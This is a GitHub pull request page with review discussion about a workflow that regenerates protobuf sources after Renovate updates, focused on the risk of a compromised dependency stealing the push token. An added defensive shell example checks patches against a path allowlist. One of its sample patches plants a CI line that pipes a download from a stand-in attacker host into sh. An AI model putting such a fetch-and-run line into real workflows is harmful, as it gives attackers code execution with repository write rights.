ci: automate protobuf source generation for Renovate updates#1920
zeitlinger wants to merge 4 commits into main from
Group protobuf-java and protoc into a single Renovate PR and add a workflow that regenerates protobuf sources when both deps are updated. Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
@roidelapluie — could you add
Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
Pull request overview
This PR adds automation to regenerate protobuf sources when Renovate updates protobuf dependencies, streamlining the update process by grouping protobuf-java and protoc updates together.
Changes:
- Groups protobuf-java and protoc in Renovate configuration to create a single PR for both updates
- Adds a GitHub Actions workflow that automatically regenerates protobuf sources when the renovate/protobuf branch is updated
- Simplifies the mise generate task by removing the mise use --pin protoc@latest command (no longer needed since Renovate handles both updates)
Reviewed changes
Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| .github/workflows/generate-protobuf.yml | New workflow that triggers on renovate/protobuf branch to regenerate protobuf sources and commit them back to the PR |
| .github/renovate.json5 | Groups protobuf-java and protoc dependencies together with separateMajorMinor disabled |
| .github/renovate-tracked-deps.json | Adds the new generate-protobuf workflow to tracked dependencies for mise version updates |
| mise.toml | Simplifies generate task by removing mise use command and updating description |
| - name: Commit and push generated sources | ||
| run: | | ||
| git diff --quiet && exit 0 | ||
| UNEXPECTED=$(git diff --name-only | grep -v '\.java$' | grep -v '^mise\.toml$' || true) |
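Review bot: the `git diff --quiet && exit 0` guard and the `git diff --name-only` list that feeds UNEXPECTED both see only tracked files, so a regeneration that produces a new .java file (a new message type after the protoc bump) exits here as "no changes" and is never committed, and an unexpected new file outside the generated tree would never appear in UNEXPECTED either. Use `git status --porcelain` (or `git ls-files --others --exclude-standard` alongside `git diff --name-only`) for both checks so added files are detected and filtered the same way as modified ones.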
The mise.toml file should not change during the generate step anymore since the mise use --pin protoc@latest command has been removed from the generate task. Including mise.toml in the list of acceptable changed files could mask unexpected modifications to this file. Consider removing | grep -v '^mise\.toml$' from this line to ensure only Java files are modified during generation.
Accepted — removed the mise.toml exception from the unexpected files check.
| # TODO: switch to PROMBOT_GITHUB_TOKEN once it's added to this repo. | ||
| git config user.name "github-actions[bot]" | ||
| git config user.email "41898282+github-actions[bot]@users.noreply.github.com" | ||
| git add '*.java' mise.toml |
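Review bot: `git add '*.java'` stages every Java file anywhere in the working tree, not only the regenerated ones, so if the updated protoc or the generate task writes a .java file outside the generated directory it is committed without tripping the UNEXPECTED check, which only looks at non-Java paths. Stage the generated output directory explicitly (its path is not shown in this hunk) or stage exactly the file list that passed the check, and consider tying the hard-coded github-actions[bot] identity to whichever token ends up doing the push so the TODO above does not leave a mismatched author.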
Since the generate task no longer modifies mise.toml (the mise use --pin protoc@latest command was removed), there's no need to add mise.toml to the git commit. This line should only add the generated Java files: git add '*.java'
| git add '*.java' mise.toml | |
| git add '*.java' |
Accepted — now only adding *.java to the commit.
Since the generate task no longer runs `mise use --pin protoc@latest`, mise.toml should not change during generation. Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
| on: | ||
| push: | ||
| branches: | ||
| - "renovate/protobuf" |
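Review bot: a `push` trigger on `renovate/protobuf` means this job runs with a write-capable token against whatever that branch contains, including the protoc version Renovate just bumped, so any code executed during generation runs with push rights to the repository. If the unprivileged-generate plus privileged-apply split is not adopted, at least add an explicit `permissions:` block limited to `contents: write`, and have the push step verify it is still on `renovate/protobuf` before pushing so a token with wider reach cannot be pointed at another branch.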
Note that a push for this from renovate could still theoretically contain untrusted code if the dependency being updated was compromised and a malicious version published.
If the update contained malicious code that tried to steal GITHUB_TOKEN (or whatever secret is used), it would be able to perform arbitrary write operations on the repository, or whatever permissions that token had.
It's risky performing automated writes to the repository with elevated permissions in this context.
It's not something I've tried to do myself, but a safer approach could be to have this job only generate a Git patch for the changes as a build artifact, and then have another job/workflow take that artifact and apply it after applying some sanity checks (e.g. the diff only updates the expected files). Then any compromised code isn't able to actually execute with access to the secrets but the protobuf files can still be regenerated.
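The artifact-and-apply split suggested in the comment above, as an added example that is not code from this PR or from the project: the sanity check the privileged apply job would run on the downloaded patch before `git apply`, refusing anything that touches a path other than a generated Java source. The generated-source directory `generated-src/` is an assumption (the real path is not shown on this page), and both sample patches are constructed inline to stand in for the uploaded artifact.

```shell
#!/bin/sh
# Added example (not the PR's code): gate the privileged "apply" job on the
# set of paths a generated patch touches. ALLOWED_RE is an assumed location
# for generated sources; adjust it to the repository's real layout.
ALLOWED_RE='^generated-src/.*\.java$'

# Print every path a unified diff touches: both sides of each "diff --git"
# header, so renames and deletions are covered. One per line, deduplicated.
patch_paths() {
  awk '/^diff --git a\// {
    line = substr($0, 14)          # strip the leading "diff --git a/"
    n = index(line, " b/")
    if (n == 0) next
    print substr(line, 1, n - 1)   # a/ side
    print substr(line, n + 3)      # b/ side
  }' "$1" | sort -u
}

# Paths outside the allowlist; empty output means the patch is acceptable.
unexpected_paths() {
  patch_paths "$1" | grep -Ev "$ALLOWED_RE" || true
}

# Return 0 only for a non-empty patch confined to generated Java sources.
# Anything else (workflow files, mise.toml, build config) is refused.
check_patch() {
  paths=$(patch_paths "$1")
  if [ -z "$paths" ]; then
    echo "refusing: patch touches no files" >&2
    return 1
  fi
  bad=$(unexpected_paths "$1")
  if [ -n "$bad" ]; then
    printf 'refusing: patch touches unexpected paths:\n%s\n' "$bad" >&2
    return 1
  fi
  return 0
}

# Constructed sample patches standing in for the artifact from the
# unprivileged generate job. The "bad" one sneaks in a workflow change.
GOOD_PATCH=$(mktemp)
cat > "$GOOD_PATCH" <<'EOF'
diff --git a/generated-src/Metrics.java b/generated-src/Metrics.java
--- a/generated-src/Metrics.java
+++ b/generated-src/Metrics.java
@@ -1 +1 @@
-// Generated by the protocol buffer compiler (old)
+// Generated by the protocol buffer compiler (new)
EOF

BAD_PATCH=$(mktemp)
cat > "$BAD_PATCH" <<'EOF'
diff --git a/generated-src/Metrics.java b/generated-src/Metrics.java
--- a/generated-src/Metrics.java
+++ b/generated-src/Metrics.java
@@ -1 +1 @@
-// Generated by the protocol buffer compiler (old)
+// Generated by the protocol buffer compiler (new)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1 +1 @@
-run: ./run-tests.sh
+run: curl -s http://attacker.invalid/x | sh
EOF

if check_patch "$GOOD_PATCH"; then echo "good patch: safe to git apply"; fi
if check_patch "$BAD_PATCH" 2>/dev/null; then echo "BUG: bad patch accepted"; else echo "bad patch: refused"; fi
```

In the apply workflow this check runs after `actions/download-artifact` and before `git apply`; because the patch is only ever applied (never executed) in the job that holds the write token, a compromised protoc can at most produce a diff, and the allowlist decides whether that diff is allowed to land. Pair it with `git apply --check` so a malformed patch fails before anything is committed.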
| fi | ||
| # Note: GITHUB_TOKEN pushes don't trigger CI re-runs. | ||
| # Close and reopen the PR to trigger CI after this commit. | ||
| # TODO: switch to PROMBOT_GITHUB_TOKEN once it's added to this repo. |
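Review bot: the close-and-reopen workaround documented in these comments means the PR's green status may belong to the commit before regeneration, and nothing in the workflow enforces that anyone actually does it. Have the step emit a warning annotation or a PR comment when it pushes so the stale status is visible, and when the TODO is resolved make PROMBOT_GITHUB_TOKEN a fine-grained token scoped to `contents: write` on this repository only, since the push step runs after the updated dependency has executed.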
If PROMBOT_GITHUB_TOKEN has permissions greater than contents: write (e.g. if it had admin access) then that might be even riskier than using GITHUB_TOKEN regardless of whether it can trigger CI or not.
Summary
- Group protobuf-java and protoc into a single Renovate PR (separateMajorMinor: false)
- Add a workflow on the renovate/protobuf branch to regenerate protobuf sources
- Remove mise use --pin protoc@latest from the generate task (no longer needed with grouping)
Known limitation
The workflow pushes with GITHUB_TOKEN, which doesn't trigger CI re-runs. After the generated commit is pushed, close and reopen the PR to trigger CI.
Follow-up: switch to PROMBOT_GITHUB_TOKEN so CI re-runs automatically.
Test plan